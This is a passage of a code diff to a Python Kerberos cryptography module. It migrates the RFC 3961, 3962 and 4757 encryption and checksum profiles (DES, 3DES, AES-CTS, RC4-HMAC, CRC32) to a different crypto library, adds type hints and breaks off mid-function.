HMAC_SHA1_DES3_KD = 12 + # HMAC_SHA1_DES3 = 13 + # SHA1 = 14 + HMAC_SHA1_96_AES128 = 15 + HMAC_SHA1_96_AES256 = 16 + # CMAC-CAMELLIA128 = 17 + # CMAC-CAMELLIA256 = 18 + HMAC_SHA256_128_AES128 = 19 + HMAC_SHA384_192_AES256 = 20 HMAC_MD5 = -138 @@ -70,40 +161,54 @@ class InvalidChecksum(ValueError): pass +######### +# Utils # +######### + + +# https://www.gnu.org/software/shishi/ides.pdf - APPENDIX B + + def _n_fold(s, n): + # type: (bytes, int) -> bytes """ - https://www.gnu.org/software/shishi/ides.pdf - APPENDIX B + n-fold is an algorithm that takes m input bits and "stretches" them + to form n output bits with equal contribution from each input bit to + the output (quote from RFC 3961 sect 3.1). """ - def rot13(x, nb): - x = bytes_int(x) + def rot13(y, nb): + # type: (bytes, int) -> bytes + x = bytes_int(y) mod = (1 << (nb * 8)) - 1 if nb == 0: - return x + return y elif nb == 1: return int_bytes(((x >> 5) | (x << (nb * 8 - 5))) & mod, nb) else: return int_bytes(((x >> 13) | (x << (nb * 8 - 13))) & mod, nb) def ocadd(x, y, nb): + # type: (bytearray, bytearray, int) -> bytearray v = [a + b for a, b in zip(x, y)] while any(x & ~0xFF for x in v): v = [(v[i - nb + 1] >> 8) + (v[i] & 0xFF) for i in range(nb)] return bytearray(x for x in v) m = len(s) - lcm = math.lcm(n, m) + lcm = n // math.gcd(n, m) * m # lcm = math.lcm(n, m) on Python>=3.9 buf = bytearray() for _ in range(lcm // m): buf += s s = rot13(s, m) - out = b"\x00" * n + out = bytearray(b"\x00" * n) for i in range(0, lcm, n): - out = ocadd(out, buf[i: i + n], n) + out = ocadd(out, buf[i : i + n], n) return bytes(out) def _zeropad(s, padsize): + # type: (bytes, int) -> bytes """ Return s padded with 0 bytes to a multiple of padsize. """ @@ -111,6 +216,7 @@ def _zeropad(s, padsize): def _xorbytes(b1, b2): + # type: (bytearray, bytearray) -> bytearray """ xor two strings together and return the resulting string """ @@ -119,6 +225,7 @@ def _xorbytes(b1, b2): def _mac_equal(mac1, mac2): + # type: (bytes, bytes) -> bool # Constant-time comparison function. (We can't use HMAC.verify # since we use truncated macs.) assert len(mac1) == len(mac2) @@ -128,29 +235,117 @@ def _mac_equal(mac1, mac2): return res == 0 +# https://doi.org/10.6028/NBS.FIPS.74 sect 3.6 + WEAK_DES_KEYS = set( [ - b"\x01" * 8, - b"\xfe" * 8, - b"\xe0" * 4 + b"\xf1" * 4, - b"\x1f" * 4 + b"\x0e" * 4, - b"\x01\x1f\x01\x1f\x01\x0e\x01\x0e", - b"\x1f\x01\x1f\x01\x0e\x01\x0e\x01", - b"\x01\xe0\x01\xe0\x01\xf1\x01\xf1", + # 1 b"\xe0\x01\xe0\x01\xf1\x01\xf1\x01", + b"\x01\xe0\x01\xe0\x01\xf1\x01\xf1", + # 2 + b"\xfe\x1f\xfe\x1f\xfe\x0e\xfe\x0e", + b"\x1f\xfe\x1f\xfe\x0e\xfe\x0e\xfe", + # 3 + b"\xe0\x1f\xe0\x1f\xf1\x0e\xf1\x0e", + b"\x1f\xe0\x1f\xe0\x0e\xf1\x0e\xf1", + # 4 b"\x01\xfe\x01\xfe\x01\xfe\x01\xfe", b"\xfe\x01\xfe\x01\xfe\x01\xfe\x01", - b"\x1f\xe0\x1f\xe0\x0e\xf1\x0e\xf1", - b"\xe0\x1f\xe0\x1f\xf1\x0e\xf1\x0e", - b"\x1f\xfe\x1f\xfe\x0e\xfe\x0e\xfe", - b"\xfe\x1f\xfe\x1f\xfe\x0e\xfe\x0e", + # 5 + b"\x01\x1f\x01\x1f\x01\x0e\x01\x0e", + b"\x1f\x01\x1f\x01\x0e\x01\x0e\x01", + # 6 b"\xe0\xfe\xe0\xfe\xf1\xfe\xf1\xfe", b"\xfe\xe0\xfe\xe0\xfe\xf1\xfe\xf1", + # 7 + b"\x01" * 8, + # 8 + b"\xfe" * 8, + # 9 + b"\xe0" * 4 + b"\xf1" * 4, + # 10 + b"\x1f" * 4 + b"\x0e" * 4, ] ) +# fmt: off +CRC32_TABLE = [ + 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, + 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, + 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, + 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, + 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, + 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, + 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, + 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, + 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, + 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, + 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, + 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, + 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, + 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, + 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, + 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, + 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, + 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, + 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, + 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, + 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, + 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, + 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, + 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, + 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, + 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, + 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, + 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, + 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, + 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, + 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, + 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, + 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, + 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, + 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, + 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, + 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, + 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, + 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, + 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, + 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, + 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, + 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, + 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, + 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, + 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, + 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, + 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, + 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, + 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, + 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, + 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, + 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, + 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, + 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, + 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, + 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, + 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, + 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, + 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, + 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, + 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, + 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, + 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d +] +# fmt: on + +############ +# RFC 3961 # +############ + + +# RFC3961 sect 3 + -class _EncryptionAlgorithmProfile(object): +class _EncryptionAlgorithmProfile(abc.ABCMeta): """ Base class for etype profiles. @@ -158,6 +353,8 @@ class _EncryptionAlgorithmProfile(object): :attr etype: etype number :attr keysize: protocol size of key in bytes :attr seedsize: random_to_key input size in bytes + :attr reqcksum: 'required checksum mechanism' per RFC3961. + this is the default checksum used for this algorithm. :attr random_to_key: (if the keyspace is not dense) :attr string_to_key: :attr encrypt: @@ -165,13 +362,81 @@ class _EncryptionAlgorithmProfile(object): :attr prf: """ + etype = None # type: EncryptionType + keysize = None # type: int + seedsize = None # type: int + reqcksum = None # type: ChecksumType + + @classmethod + @abc.abstractmethod + def derive(cls, key, constant): + # type: (Key, bytes) -> bytes + pass + + @classmethod + @abc.abstractmethod + def encrypt(cls, key, keyusage, plaintext, confounder): + # type: (Key, int, bytes, Optional[bytes]) -> bytes + pass + + @classmethod + @abc.abstractmethod + def decrypt(cls, key, keyusage, ciphertext): + # type: (Key, int, bytes) -> bytes + pass + + @classmethod + @abc.abstractmethod + def prf(cls, key, string): + # type: (Key, bytes) -> bytes + pass + + @classmethod + @abc.abstractmethod + def string_to_key(cls, string, salt, params): + # type: (bytes, bytes, Optional[bytes]) -> Key + pass + @classmethod def random_to_key(cls, seed): + # type: (bytes) -> Key if len(seed) != cls.seedsize: raise ValueError("Wrong seed length") return Key(cls.etype, key=seed) +# RFC3961 sect 4 + + +class _ChecksumProfile(object): + """ + Base class for checksum profiles. + + Usable checksum classes must define: + :func checksum: + :attr macsize: Size of checksum in bytes + :func verify: (if verification is not just checksum-and-compare) + """ + + macsize = None # type: int + + @classmethod + @abc.abstractmethod + def checksum(cls, key, keyusage, text): + # type: (Key, int, bytes) -> bytes + pass + + @classmethod + def verify(cls, key, keyusage, text, cksum): + # type: (Key, int, bytes, bytes) -> None + expected = cls.checksum(key, keyusage, text) + if not _mac_equal(cksum, expected): + raise InvalidChecksum("checksum verification failure") + + +# RFC3961 sect 5.3 + + class _SimplifiedEncryptionProfile(_EncryptionAlgorithmProfile): """ Base class for etypes using the RFC 3961 simplified profile. @@ -182,12 +447,34 @@ class _SimplifiedEncryptionProfile(_EncryptionAlgorithmProfile): :param blocksize: Underlying cipher block size in bytes :param padsize: Underlying cipher padding multiple (1 or blocksize) :param macsize: Size of integrity MAC in bytes - :param hash: underlying hash function + :param hashmod: underlying hash function :param basic_encrypt, basic_decrypt: Underlying CBC/CTS cipher """ + blocksize = None # type: int + padsize = None # type: int + macsize = None # type: int + hashmod = None # type: Any + + # Used in RFC 8009. This is not a simplified profile per se but + # is still pretty close. + rfc8009 = False + + @classmethod + @abc.abstractmethod + def basic_encrypt(cls, key, plaintext): + # type: (bytes, bytes) -> bytes + pass + + @classmethod + @abc.abstractmethod + def basic_decrypt(cls, key, ciphertext): + # type: (bytes, bytes) -> bytes + pass + @classmethod def derive(cls, key, constant): + # type: (Key, bytes) -> bytes """ Also known as "DK" in RFC3961. """ @@ -199,55 +486,80 @@ def derive(cls, key, constant): plaintext = _n_fold(constant, cls.blocksize) rndseed = b"" while len(rndseed) < cls.seedsize: - ciphertext = cls.basic_encrypt(key, plaintext) + ciphertext = cls.basic_encrypt(key.key, plaintext) rndseed += ciphertext plaintext = ciphertext # DK(Key, Constant) = random-to-key(DR(Key, Constant)) - return cls.random_to_key(rndseed[0: cls.seedsize]) + return cls.random_to_key(rndseed[0 : cls.seedsize]).key @classmethod def encrypt(cls, key, keyusage, plaintext, confounder): + # type: (Key, int, bytes, Optional[bytes]) -> bytes """ encryption function """ - ki = cls.derive(key, struct.pack(">IB", keyusage, 0x55)) - ke = cls.derive(key, struct.pack(">IB", keyusage, 0xAA)) + if not cls.rfc8009: + ki = cls.derive(key, struct.pack(">IB", keyusage, 0x55)) + ke = cls.derive(key, struct.pack(">IB", keyusage, 0xAA)) + else: + ki = cls.derive(key, struct.pack(">IB", keyusage, 0x55), cls.macsize * 8) # type: ignore # noqa: E501 + ke = cls.derive(key, struct.pack(">IB", keyusage, 0xAA), cls.keysize * 8) # type: ignore # noqa: E501 if confounder is None: confounder = os.urandom(cls.blocksize) basic_plaintext = confounder + _zeropad(plaintext, cls.padsize) - hmac = HMAC.new(ki.key, basic_plaintext, cls.hashmod).digest() - return cls.basic_encrypt(ke, basic_plaintext) + hmac[: cls.macsize] + if not cls.rfc8009: + # Simplified profile + hmac = Hmac(ki, cls.hashmod).digest(basic_plaintext) + return cls.basic_encrypt(ke, basic_plaintext) + hmac[: cls.macsize] + else: + # RFC 8009 + C = cls.basic_encrypt(ke, basic_plaintext) + hmac = Hmac(ki, cls.hashmod).digest(b"\0" * 16 + C) # XXX IV + return C + hmac[: cls.macsize] @classmethod def decrypt(cls, key, keyusage, ciphertext): + # type: (Key, int, bytes) -> bytes """ decryption function """ - ki = cls.derive(key, struct.pack(">IB", keyusage, 0x55)) - ke = cls.derive(key, struct.pack(">IB", keyusage, 0xAA)) + if not cls.rfc8009: + ki = cls.derive(key, struct.pack(">IB", keyusage, 0x55)) + ke = cls.derive(key, struct.pack(">IB", keyusage, 0xAA)) + else: + ki = cls.derive(key, struct.pack(">IB", keyusage, 0x55), cls.macsize * 8) # type: ignore # noqa: E501 + ke = cls.derive(key, struct.pack(">IB", keyusage, 0xAA), cls.keysize * 8) # type: ignore # noqa: E501 if len(ciphertext) < cls.blocksize + cls.macsize: raise ValueError("Ciphertext too short") - basic_ctext, mac = bytearray(ciphertext[: -cls.macsize]), bytearray( - ciphertext[-cls.macsize:] - ) + basic_ctext, mac = ciphertext[: -cls.macsize], ciphertext[-cls.macsize :] if len(basic_ctext) % cls.padsize != 0: raise ValueError("ciphertext does not meet padding requirement") - basic_plaintext = cls.basic_decrypt(ke, bytes(basic_ctext)) - hmac = bytearray(HMAC.new(ki.key, basic_plaintext, cls.hashmod).digest()) - expmac = hmac[: cls.macsize] - if not _mac_equal(mac, expmac): - raise ValueError("ciphertext integrity failure") + if not cls.rfc8009: + # Simplified profile + basic_plaintext = cls.basic_decrypt(ke, basic_ctext) + hmac = Hmac(ki, cls.hashmod).digest(basic_plaintext) + expmac = hmac[: cls.macsize] + if not _mac_equal(mac, expmac): + raise ValueError("ciphertext integrity failure") + else: + # RFC 8009 + hmac = Hmac(ki, cls.hashmod).digest(b"\0" * 16 + basic_ctext) # XXX IV + expmac = hmac[: cls.macsize] + if not _mac_equal(mac, expmac): + raise ValueError("ciphertext integrity failure") + basic_plaintext = cls.basic_decrypt(ke, basic_ctext) # Discard the confounder. - return bytes(basic_plaintext[cls.blocksize:]) + return bytes(basic_plaintext[cls.blocksize :]) @classmethod def prf(cls, key, string): + # type: (Key, bytes) -> bytes """ pseudo-random function """ # Hash the input. RFC 3961 says to truncate to the padding # size, but implementations truncate to the block size. - hashval = cls.hashmod.new(string).digest() + hashval = cls.hashmod().digest(string) if len(hashval) % cls.blocksize: hashval = hashval[: -(len(hashval) % cls.blocksize)] # Encrypt the hash with a derived key. @@ -255,49 +567,115 @@ def prf(cls, key, string): return cls.basic_encrypt(kp, hashval) +# RFC3961 sect 5.4 + + +class _SimplifiedChecksum(_ChecksumProfile): + """ + Base class for checksums using the RFC 3961 simplified profile. + Defines the checksum and verify methods. + + Subclasses must define: + :attr enc: Profile of associated etype + """ + + enc = None # type: Type[_SimplifiedEncryptionProfile] + + # Used in RFC 8009. This is not a simplified profile per se but + # is still pretty close. + rfc8009 = False + + @classmethod + def checksum(cls, key, keyusage, text): + # type: (Key, int, bytes) -> bytes + if not cls.rfc8009: + # Simplified profile + kc = cls.enc.derive(key, struct.pack(">IB", keyusage, 0x99)) + else: + # RFC 8009 + kc = cls.enc.derive( # type: ignore + key, struct.pack(">IB", keyusage, 0x99), cls.macsize * 8 + ) + hmac = Hmac(kc, cls.enc.hashmod).digest(text) + return hmac[: cls.macsize] + + @classmethod + def verify(cls, key, keyusage, text, cksum): + # type: (Key, int, bytes, bytes) -> None + if key.etype != cls.enc.etype: + raise ValueError("Wrong key type for checksum") + super(_SimplifiedChecksum, cls).verify(key, keyusage, text, cksum) + + +# RFC3961 sect 6.1 + + +class _CRC32(_ChecksumProfile): + macsize = 4 + + # This isn't your usual CRC32, it's a "modified version" according to the RFC3961. + # Another RFC states it's just a buggy version of the actual CRC32. + + @classmethod + def checksum(cls, key, keyusage, text): + # type: (Optional[Key], int, bytes) -> bytes + c = 0 + for i in range(len(text)): + idx = text[i] ^ c + idx &= 0xFF + c >>= 8 + c ^= CRC32_TABLE[idx] + return c.to_bytes(4, "little") + + +# RFC3961 sect 6.2 + + class _DESCBC(_SimplifiedEncryptionProfile): keysize = 8 seedsize = 8 blocksize = 8 padsize = 8 macsize = 16 - hashmod = MD5 + hashmod = Hash_MD5 @classmethod def encrypt(cls, key, keyusage, plaintext, confounder): + # type: (Key, int, bytes, Optional[bytes]) -> bytes if confounder is None: confounder = os.urandom(cls.blocksize) basic_plaintext = ( confounder + b"\x00" * cls.macsize + _zeropad(plaintext, cls.padsize) ) - checksum = cls.hashmod.new(basic_plaintext).digest() + checksum = cls.hashmod().digest(basic_plaintext) basic_plaintext = ( - basic_plaintext[: len(confounder)] + - checksum + - basic_plaintext[len(confounder) + len(checksum):] + basic_plaintext[: len(confounder)] + + checksum + + basic_plaintext[len(confounder) + len(checksum) :] ) - return cls.basic_encrypt(key, basic_plaintext) + return cls.basic_encrypt(key.key, basic_plaintext) @classmethod def decrypt(cls, key, keyusage, ciphertext): + # type: (Key, int, bytes) -> bytes if len(ciphertext) < cls.blocksize + cls.macsize: raise ValueError("ciphertext too short") - complex_plaintext = cls.basic_decrypt(key, ciphertext) + complex_plaintext = cls.basic_decrypt(key.key, ciphertext) cofounder = complex_plaintext[: cls.padsize] - mac = complex_plaintext[cls.padsize: cls.padsize + cls.macsize] - message = complex_plaintext[cls.padsize + cls.macsize:] + mac = complex_plaintext[cls.padsize : cls.padsize + cls.macsize] + message = complex_plaintext[cls.padsize + cls.macsize :] - expmac = bytearray( - cls.hashmod.new(cofounder + b"\x00" * cls.macsize + message).digest() - ) + expmac = cls.hashmod().digest(cofounder + b"\x00" * cls.macsize + message) if not _mac_equal(mac, expmac): raise InvalidChecksum("ciphertext integrity failure") return bytes(message) @classmethod def mit_des_string_to_key(cls, string, salt): + # type: (bytes, bytes) -> Key def fixparity(deskey): + # type: (List[int]) -> bytes temp = b"" for i in range(len(deskey)): t = (bin(orb(deskey[i]))[2:]).rjust(8, "0") @@ -308,6 +686,7 @@ def fixparity(deskey): return temp def addparity(l1): + # type: (List[int]) -> List[int] temp = list() for byte in l1: if (bin(byte).count("1") % 2) == 0: @@ -318,6 +697,7 @@ def addparity(l1): return temp def XOR(l1, l2): + # type: (List[int], List[int]) -> List[int] temp = list() for b1, b2 in zip(l1, l2): temp.append((b1 ^ b2) & 0b01111111) @@ -328,7 +708,7 @@ def XOR(l1, l2): tempstring = [0, 0, 0, 0, 0, 0, 0, 0] s = _zeropad(string + salt, cls.padsize) - for block in [s[i: i + 8] for i in range(0, len(s), 8)]: + for block in [s[i : i + 8] for i in range(0, len(s), 8)]: temp56 = list() # removeMSBits for byte in block: @@ -342,7 +722,7 @@ def XOR(l1, l2): bintemp = bintemp[::-1] temp56 = list() - for bits7 in [bintemp[i: i + 7] for i in range(0, len(bintemp), 7)]: + for bits7 in [bintemp[i : i + 7] for i in range(0, len(bintemp), 7)]: temp56.append(int(bits7, 2)) odd = not odd @@ -352,8 +732,9 @@ def XOR(l1, l2): if bytes(tempkey) in WEAK_DES_KEYS: tempkey[7] = tempkey[7] ^ 0xF0 - cipher = DES.new(tempkey, DES.MODE_CBC, tempkey) - chekcsumkey = cipher.encrypt(s)[-8:] + tempkeyb = bytes(tempkey) + des = Cipher(DES(tempkeyb), modes.CBC(tempkeyb)).encryptor() + chekcsumkey = des.update(s)[-8:] chekcsumkey = bytearray(fixparity(chekcsumkey)) if bytes(chekcsumkey) in WEAK_DES_KEYS: chekcsumkey[7] = chekcsumkey[7] ^ 0xF0 @@ -362,50 +743,68 @@ def XOR(l1, l2): @classmethod def basic_encrypt(cls, key, plaintext): + # type: (bytes, bytes) -> bytes assert len(plaintext) % 8 == 0 - des = DES.new(key.key, DES.MODE_CBC, b"\0" * 8) - return des.encrypt(bytes(plaintext)) + des = Cipher(DES(key), modes.CBC(b"\0" * 8)).encryptor() + return des.update(bytes(plaintext)) @classmethod def basic_decrypt(cls, key, ciphertext): + # type: (bytes, bytes) -> bytes assert len(ciphertext) % 8 == 0 - des = DES.new(key.key, DES.MODE_CBC, b"\0" * 8) - return des.decrypt(bytes(ciphertext)) + des = Cipher(DES(key), modes.CBC(b"\0" * 8)).decryptor() + return des.update(bytes(ciphertext)) @classmethod def string_to_key(cls, string, salt, params): + # type: (bytes, bytes, Optional[bytes]) -> Key if params is not None and params != b"": raise ValueError("Invalid DES string-to-key parameters") key = cls.mit_des_string_to_key(string, salt) return key +# RFC3961 sect 6.2.1 + + class _DESMD5(_DESCBC): - etype = EncryptionType.DES_MD5 - hashmod = MD5 + etype = EncryptionType.DES_CBC_MD5 + hashmod = Hash_MD5 + reqcksum = ChecksumType.RSA_MD5_DES + + +# RFC3961 sect 6.2.2 class _DESMD4(_DESCBC): - etype = EncryptionType.DES_MD4 - hashmod = MD4 + etype = EncryptionType.DES_CBC_MD4 + hashmod = Hash_MD4 + reqcksum = ChecksumType.RSA_MD4_DES + + +# RFC3961 sect 6.3 class _DES3CBC(_SimplifiedEncryptionProfile): - etype = EncryptionType.DES3 + etype = EncryptionType.DES3_CBC_SHA1_KD keysize = 24 seedsize = 21 blocksize = 8 padsize = 8 macsize = 20 - hashmod = SHA + hashmod = Hash_SHA + reqcksum = ChecksumType.HMAC_SHA1_DES3_KD @classmethod def random_to_key(cls, seed): + # type: (bytes) -> Key # XXX Maybe reframe as _DESEncryptionType.random_to_key and use that # way from DES3 random-to-key when DES is implemented, since # MIT does this instead of the RFC 3961 random-to-key. def expand(seed): + # type: (bytes) -> bytes def parity(b): + # type: (int) -> int # Return b with the low-order bit set to yield odd parity. b &= ~1 return b if bin(b & ~1).count("1") % 2 else b | 1 @@ -413,12 +812,11 @@ def parity(b): assert len(seed) == 7 firstbytes = [parity(b & ~1) for b in seed] lastbyte = parity(sum((seed[i] & 1) << i + 1 for i in range(7))) - keybytes = bytes(bytearray(firstbytes + [lastbyte])) - if keybytes in WEAK_DES_KEYS: + keybytes = bytearray(firstbytes + [lastbyte]) + if bytes(keybytes) in WEAK_DES_KEYS: keybytes[7] = keybytes[7] ^ 0xF0 return bytes(keybytes) - seed = bytearray(seed) if len(seed) != 21: raise ValueError("Wrong seed length") k1, k2, k3 = expand(seed[:7]), expand(seed[7:14]), expand(seed[14:]) @@ -426,44 +824,73 @@ def parity(b): @classmethod def string_to_key(cls, string, salt, params): + # type: (bytes, bytes, Optional[bytes]) -> Key if params is not None and params != b"": raise ValueError("Invalid DES3 string-to-key parameters") k = cls.random_to_key(_n_fold(string + salt, 21)) - return cls.derive(k, b"kerberos") + return Key( + cls.etype, + key=cls.derive(k, b"kerberos"), + ) @classmethod def basic_encrypt(cls, key, plaintext): + # type: (bytes, bytes) -> bytes assert len(plaintext) % 8 == 0 - des3 = DES3.new(key.key, AES.MODE_CBC, b"\0" * 8) - return des3.encrypt(bytes(plaintext)) + des3 = Cipher(algorithms.TripleDES(key), modes.CBC(b"\0" * 8)).encryptor() + return des3.update(bytes(plaintext)) @classmethod def basic_decrypt(cls, key, ciphertext): + # type: (bytes, bytes) -> bytes assert len(ciphertext) % 8 == 0 - des3 = DES3.new(key.key, AES.MODE_CBC, b"\0" * 8) - return des3.decrypt(bytes(ciphertext)) + des3 = Cipher(algorithms.TripleDES(key), modes.CBC(b"\0" * 8)).decryptor() + return des3.update(bytes(ciphertext)) + + +class _SHA1DES3(_SimplifiedChecksum): + macsize = 20 + enc = _DES3CBC + + +############ +# RFC 3962 # +############ + + +# RFC3962 sect 6 -class _AESEncryptionType(_SimplifiedEncryptionProfile): - # Base class for aes128-cts and aes256-cts. +class _AESEncryptionType_SHA1_96(_SimplifiedEncryptionProfile, abc.ABCMeta): blocksize = 16 padsize = 1 macsize = 12 - hashmod = SHA + hashmod = Hash_SHA @classmethod def string_to_key(cls, string, salt, params): + # type: (bytes, bytes, Optional[bytes]) -> Key iterations = struct.unpack(">L", params or b"\x00\x00\x10\x00")[0] - prf = lambda p, s: HMAC.new(p, s, SHA).digest() - seed = PBKDF2(string, salt, cls.seedsize, iterations, prf) - tkey = cls.random_to_key(seed) - return cls.derive(tkey, b"kerberos") + kdf = PBKDF2HMAC( + algorithm=hashes.SHA1(), + length=cls.seedsize, + salt=salt, + iterations=iterations, + ) + tkey = cls.random_to_key(kdf.derive(string)) + return Key( + cls.etype, + key=cls.derive(tkey, b"kerberos"), + ) + + # basic_encrypt and basic_decrypt implement AES in CBC-CS3 mode @classmethod def basic_encrypt(cls, key, plaintext): + # type: (bytes, bytes) -> bytes assert len(plaintext) >= 16 - aes = AES.new(key.key, AES.MODE_CBC, b"\0" * 16) - ctext = aes.encrypt(_zeropad(bytes(plaintext), 16)) + aes = Cipher(algorithms.AES(key), modes.CBC(b"\0" * 16)).encryptor() + ctext = aes.update(_zeropad(bytes(plaintext), 16)) if len(plaintext) > 16: # Swap the last two ciphertext blocks and truncate the # final block to match the plaintext length. @@ -473,90 +900,143 @@ def basic_encrypt(cls, key, plaintext): @classmethod def basic_decrypt(cls, key, ciphertext): + # type: (bytes, bytes) -> bytes assert len(ciphertext) >= 16 - aes = AES.new(key.key, AES.MODE_ECB) + aes = Cipher(algorithms.AES(key), modes.ECB()).decryptor() if len(ciphertext) == 16: - return aes.decrypt(ciphertext) + return aes.update(ciphertext) # Split the ciphertext into blocks. The last block may be partial. cblocks = [ - bytearray(ciphertext[p: p + 16]) for p in range(0, len(ciphertext), 16) + bytearray(ciphertext[p : p + 16]) for p in range(0, len(ciphertext), 16) ] lastlen = len(cblocks[-1]) # CBC-decrypt all but the last two blocks. prev_cblock = bytearray(16) plaintext = b"" for bb in cblocks[:-2]: - plaintext += _xorbytes(bytearray(aes.decrypt(bytes(bb))), prev_cblock) + plaintext += _xorbytes(bytearray(aes.update(bytes(bb))), prev_cblock) prev_cblock = bb # Decrypt the second-to-last cipher block. The left side of # the decrypted block will be the final block of plaintext # xor'd with the final partial cipher block; the right side # will be the omitted bytes of ciphertext from the final # block. - bb = bytearray(aes.decrypt(bytes(cblocks[-2]))) + bb = bytearray(aes.update(bytes(cblocks[-2]))) lastplaintext = _xorbytes(bb[:lastlen], cblocks[-1]) omitted = bb[lastlen:] # Decrypt the final cipher block plus the omitted bytes to get # the second-to-last plaintext block. plaintext += _xorbytes( - bytearray(aes.decrypt(bytes(cblocks[-1]) + bytes(omitted))), prev_cblock + bytearray(aes.update(bytes(cblocks[-1]) + bytes(omitted))), prev_cblock ) return plaintext + lastplaintext -class _AES128CTS(_AESEncryptionType): - etype = 17 # AES128 +# RFC3962 sect 7 + + +class _AES128CTS_SHA1_96(_AESEncryptionType_SHA1_96): + etype = EncryptionType.AES128_CTS_HMAC_SHA1_96 keysize = 16 seedsize = 16 + reqcksum = ChecksumType.HMAC_SHA1_96_AES128 -class _AES256CTS(_AESEncryptionType): - etype = 18 # AES256 +class _AES256CTS_SHA1_96(_AESEncryptionType_SHA1_96): + etype = EncryptionType.AES256_CTS_HMAC_SHA1_96 keysize = 32 seedsize = 32 + reqcksum = ChecksumType.HMAC_SHA1_96_AES256 + + +class _SHA1_96_AES128(_SimplifiedChecksum): + macsize = 12 + enc = _AES128CTS_SHA1_96 + + +class _SHA1_96_AES256(_SimplifiedChecksum): + macsize = 12 + enc = _AES256CTS_SHA1_96 + + +############ +# RFC 4757 # +############ + +# RFC4757 sect 4 + + +class _HMACMD5(_ChecksumProfile): + macsize = 16 + + @classmethod + def checksum(cls, key, keyusage, text): + # type: (Key, int, bytes) -> bytes + ksign = Hmac_MD5(key.key).digest(b"signaturekey\0") + md5hash = Hash_MD5().digest(_RC4.usage_str(keyusage) + text) + return Hmac_MD5(ksign).digest(md5hash) + + @classmethod + def verify(cls, key, keyusage, text, cksum): + # type: (Key, int, bytes, bytes) -> None + if key.etype != EncryptionType.RC4_HMAC: + raise ValueError("Wrong key type for checksum") + super(_HMACMD5, cls).verify(key, keyusage, text, cksum) + + +# RFC4757 sect 5 class _RC4(_EncryptionAlgorithmProfile): - etype = 23 # RC4 + etype = EncryptionType.RC4_HMAC keysize = 16 seedsize = 16 + reqcksum = ChecksumType.HMAC_MD5 @staticmethod def usage_str(keyusage): + # type: (int) -> 